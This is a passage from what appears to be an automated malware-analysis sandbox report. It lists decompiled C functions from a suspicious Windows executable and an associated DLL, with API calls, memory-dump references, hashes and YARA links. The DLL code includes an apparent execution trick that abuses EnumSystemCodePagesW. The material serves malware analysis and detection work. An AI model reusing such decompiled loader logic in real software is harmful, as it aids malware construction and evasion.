                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                            • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                            • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                            • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                            0x00405841
                                                                                                            0x0040584e
                                                                                                            0x00405863
                                                                                                            0x00405869

                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\5t2CmTUhKc.exe,80000000,00000003), ref: 00405841
                                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                            • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                            • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                            • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                            0x00405822
                                                                                                            0x0040582b
                                                                                                            0x00000000
                                                                                                            0x00405834
                                                                                                            0x0040583a

                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                            • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                                            • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                            • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 73612A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E73612A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73614040 != 0 && E7361297D(_a4) == 0) {
					 *0x73614044 = _t93;
					if( *0x7361403c != 0) {
						_t93 =  *0x7361403c;
					} else {
						E73612F60(E73612977(), __ecx);
						 *0x7361403c = _t93;
					}
				}
				_t28 = E736129AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E7361299F();
					_t72 = _a4;
					_t79 =  *0x73614048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73614048 = _t72;
					E73612999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x7361401c = _t33;
					 *0x73614020 = _t79;
					if( *0x73614040 != 0 && E7361297D( *0x73614048) == 0) {
						 *0x7361403c = _t94;
						_t94 =  *0x73614044;
					}
					_t80 =  *0x73614048;
					_a4 = _t80;
					 *0x73614048 =  *((intOrPtr*)(E7361299F() + _t80));
					_t37 = E7361298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E736129AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E736129B6() + _a4 + _v8);
							_push(E736129C0());
							if( *0x73614040 <= 0 || E7361297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7361403c =  *0x7361403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73614048;
					if( *0x73614048 == 0) {
						 *0x7361403c = 0;
					}
					E736129E4(_t107, _a4,  *0x7361401c,  *0x73614020);
					return _a4;
				}
				_push(E736129B6() + _a4);
				_t56 = E736129BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E736129C8();
				_t87 = E736129C4();
				_t90 = E736129C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                            0x73612a48
                                                                                                            0x73612a59
                                                                                                            0x73612a66
                                                                                                            0x73612a7a
                                                                                                            0x73612a68
                                                                                                            0x73612a6d
                                                                                                            0x73612a72
                                                                                                            0x73612a72
                                                                                                            0x73612a66
                                                                                                            0x73612a83
                                                                                                            0x73612a88
                                                                                                            0x73612a8e
                                                                                                            0x73612ad2
                                                                                                            0x73612ad2
                                                                                                            0x73612ad7
                                                                                                            0x73612adc
                                                                                                            0x73612ae2
                                                                                                            0x73612ae4
                                                                                                            0x73612aea
                                                                                                            0x73612af7
                                                                                                            0x73612af9
                                                                                                            0x73612afe
                                                                                                            0x73612b0b
                                                                                                            0x73612b1e
                                                                                                            0x73612b24
                                                                                                            0x73612b2a
                                                                                                            0x73612b2b
                                                                                                            0x73612b31
                                                                                                            0x73612b3d
                                                                                                            0x73612b43
                                                                                                            0x73612b4b
                                                                                                            0x73612b4c
                                                                                                            0x73612b4f
                                                                                                            0x73612b5a
                                                                                                            0x73612b5c
                                                                                                            0x73612b68
                                                                                                            0x73612b6e
                                                                                                            0x73612b76
                                                                                                            0x73612ba2
                                                                                                            0x73612ba3
                                                                                                            0x73612ba5
                                                                                                            0x73612ba9
                                                                                                            0x73612ba9
                                                                                                            0x73612bb0
                                                                                                            0x73612b86
                                                                                                            0x73612b86
                                                                                                            0x73612b87
                                                                                                            0x73612b95
                                                                                                            0x73612b9e
                                                                                                            0x73612b9e
                                                                                                            0x73612b76
                                                                                                            0x73612b5a
                                                                                                            0x73612bb2
                                                                                                            0x73612bb9
                                                                                                            0x73612bbb
                                                                                                            0x73612bbb
                                                                                                            0x73612bd4
                                                                                                            0x73612be2
                                                                                                            0x73612be2
                                                                                                            0x73612a99
                                                                                                            0x73612a9a
                                                                                                            0x73612a9f
                                                                                                            0x73612aa3
                                                                                                            0x73612aa8
                                                                                                            0x73612abc
                                                                                                            0x73612abd
                                                                                                            0x73612abe
                                                                                                            0x73612ac0
                                                                                                            0x73612ac5
                                                                                                            0x73612ac7
                                                                                                            0x73612ac7
                                                                                                            0x73612aca
                                                                                                            0x73612ad0
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73612AF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CodeEnumPagesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2369445336-0
                                                                                                            • Opcode ID: 29e6f55390ba504b88860062fc0d5e8d3e623f9021f08eead6723f860147e7a4
                                                                                                            • Instruction ID: 04aac5699212599644e49261a15551349ed333209bc5602aaf123e0efbd94b8c
                                                                                                            • Opcode Fuzzy Hash: 29e6f55390ba504b88860062fc0d5e8d3e623f9021f08eead6723f860147e7a4
                                                                                                            • Instruction Fuzzy Hash: C741937350031EDFEB12EFABD984B593776EB04355F248826E409C71D4E63495A0CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                            0x004031c3
                                                                                                            0x004031d6
                                                                                                            0x004031de
                                                                                                            0x00000000
                                                                                                            0x004031e5
                                                                                                            0x00000000
                                                                                                            0x004031e7

                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                            • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                            • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                            • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                            0x004031ff
                                                                                                            0x00403205

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                            • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                            • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                            • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 7361101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 16%
                                                                                                            			E7361101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E736114BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E736114E2();
			}





                                                                                                            0x7361101b
                                                                                                            0x73611022
                                                                                                            0x7361102f
                                                                                                            0x73611035
                                                                                                            0x73611024
                                                                                                            0x73611024
                                                                                                            0x73611024
                                                                                                            0x7361103c

                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,73611019,00000001), ref: 7361102F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 41e594699830fe46bf8392ee6ba9669030b963f0ac6d0ebaf79f6d6d1ed4276b
                                                                                                            • Instruction ID: 21ace9df934f26820ff80c2775a37faf31b8eca3228ccb4528a9d5001e966025
                                                                                                            • Opcode Fuzzy Hash: 41e594699830fe46bf8392ee6ba9669030b963f0ac6d0ebaf79f6d6d1ed4276b
                                                                                                            • Instruction Fuzzy Hash: 4FC04CE2915343BFE625D7F64E49F1A67AC9B48A53F208405F647D60C4DE28C6206639
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 73611215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E73611215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x7361405c); // executed
				return _t1;
			}




                                                                                                            0x7361121d
                                                                                                            0x73611223

                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,73611233,?,736112CF,-7361404B,736111AB,-000000A0), ref: 7361121D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 095bffa9158a455b65222a4df2c64efd2ad32e947b6e25a6173e9278467294d2
                                                                                                            • Instruction ID: 97b718eb1057d9234f25304fff0469601711d726ca445c50a907783549057f0e
                                                                                                            • Opcode Fuzzy Hash: 095bffa9158a455b65222a4df2c64efd2ad32e947b6e25a6173e9278467294d2
                                                                                                            • Instruction Fuzzy Hash: CDA00172944110DADF42ABE28A0EB143A61A748702F208142E35A5A19896664010DB25
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                            0x0040504b
                                                                                                            0x00405051
                                                                                                            0x0040505a
                                                                                                            0x0040505d
                                                                                                            0x004051f5
                                                                                                            0x00405219
                                                                                                            0x00405219
                                                                                                            0x0040522c
                                                                                                            0x0040524a
                                                                                                            0x00405251
                                                                                                            0x004052a8
                                                                                                            0x004052ac
                                                                                                            0x00000000
                                                                                                            0x004052b3
                                                                                                            0x004052bb
                                                                                                            0x004052c3
                                                                                                            0x004052c6
                                                                                                            0x004053bf
                                                                                                            0x00000000
                                                                                                            0x004053bf
                                                                                                            0x004052d5
                                                                                                            0x004052e1
                                                                                                            0x004052e7
                                                                                                            0x004052ed
                                                                                                            0x00405302
                                                                                                            0x00405308
                                                                                                            0x004052ef
                                                                                                            0x004052f4
                                                                                                            0x004052fa
                                                                                                            0x004052fd
                                                                                                            0x004052fd
                                                                                                            0x00405318
                                                                                                            0x00405320
                                                                                                            0x00405323
                                                                                                            0x0040532c
                                                                                                            0x0040532f
                                                                                                            0x00405336
                                                                                                            0x0040533d
                                                                                                            0x00405345
                                                                                                            0x00405345
                                                                                                            0x0040535c
                                                                                                            0x0040535c
                                                                                                            0x00405363
                                                                                                            0x00405369
                                                                                                            0x00405372
                                                                                                            0x00405379
                                                                                                            0x00405382
                                                                                                            0x00405384
                                                                                                            0x00405387
                                                                                                            0x00405396
                                                                                                            0x00405398
                                                                                                            0x0040539e
                                                                                                            0x0040539f
                                                                                                            0x004053a0
                                                                                                            0x004053a8
                                                                                                            0x004053b3
                                                                                                            0x004053b9
                                                                                                            0x004053b9
                                                                                                            0x00000000
                                                                                                            0x00405323
                                                                                                            0x004052ac
                                                                                                            0x00405259
                                                                                                            0x00405289
                                                                                                            0x00405291
                                                                                                            0x0040529c
                                                                                                            0x0040529c
                                                                                                            0x004052a3
                                                                                                            0x00000000
                                                                                                            0x004052a3
                                                                                                            0x0040525d
                                                                                                            0x00405267
                                                                                                            0x00000000
                                                                                                            0x0040522e
                                                                                                            0x00405234
                                                                                                            0x0040526c
                                                                                                            0x00000000
                                                                                                            0x00405275
                                                                                                            0x0040523d
                                                                                                            0x00405242
                                                                                                            0x00405245
                                                                                                            0x00000000
                                                                                                            0x00405245
                                                                                                            0x0040522c
                                                                                                            0x00405063
                                                                                                            0x00405067
                                                                                                            0x00405070
                                                                                                            0x00405077
                                                                                                            0x0040507a
                                                                                                            0x0040507d
                                                                                                            0x00405080
                                                                                                            0x00405081
                                                                                                            0x00405082
                                                                                                            0x0040509b
                                                                                                            0x0040509e
                                                                                                            0x004050a8
                                                                                                            0x004050b7
                                                                                                            0x004050bf
                                                                                                            0x004050c7
                                                                                                            0x004050cc
                                                                                                            0x004050cf
                                                                                                            0x004050db
                                                                                                            0x004050e4
                                                                                                            0x004050ed
                                                                                                            0x00405110
                                                                                                            0x00405116
                                                                                                            0x00405127
                                                                                                            0x0040512c
                                                                                                            0x0040513a
                                                                                                            0x00405148
                                                                                                            0x00405148
                                                                                                            0x0040514d
                                                                                                            0x0040515b
                                                                                                            0x0040515b
                                                                                                            0x00405160
                                                                                                            0x00405163
                                                                                                            0x00405168
                                                                                                            0x00405174
                                                                                                            0x0040517d
                                                                                                            0x0040518a
                                                                                                            0x00405199
                                                                                                            0x0040518c
                                                                                                            0x00405191
                                                                                                            0x00405191
                                                                                                            0x004051a5
                                                                                                            0x004051a5
                                                                                                            0x004051b9
                                                                                                            0x004051c2
                                                                                                            0x004051cb
                                                                                                            0x004051db
                                                                                                            0x004051e7
                                                                                                            0x004051e7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004050A1
                                                                                                            • GetDlgItem.USER32 ref: 004050B0
                                                                                                            • GetClientRect.USER32 ref: 004050ED
                                                                                                            • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                            • GetDlgItem.USER32 ref: 004051B2
                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                            • GetDlgItem.USER32 ref: 004050BF
                                                                                                              • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                            • GetDlgItem.USER32 ref: 00405204
                                                                                                            • CreateThread.KERNEL32 ref: 00405212
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                            • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                            • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                            • CreatePopupMenu.USER32 ref: 004052CC
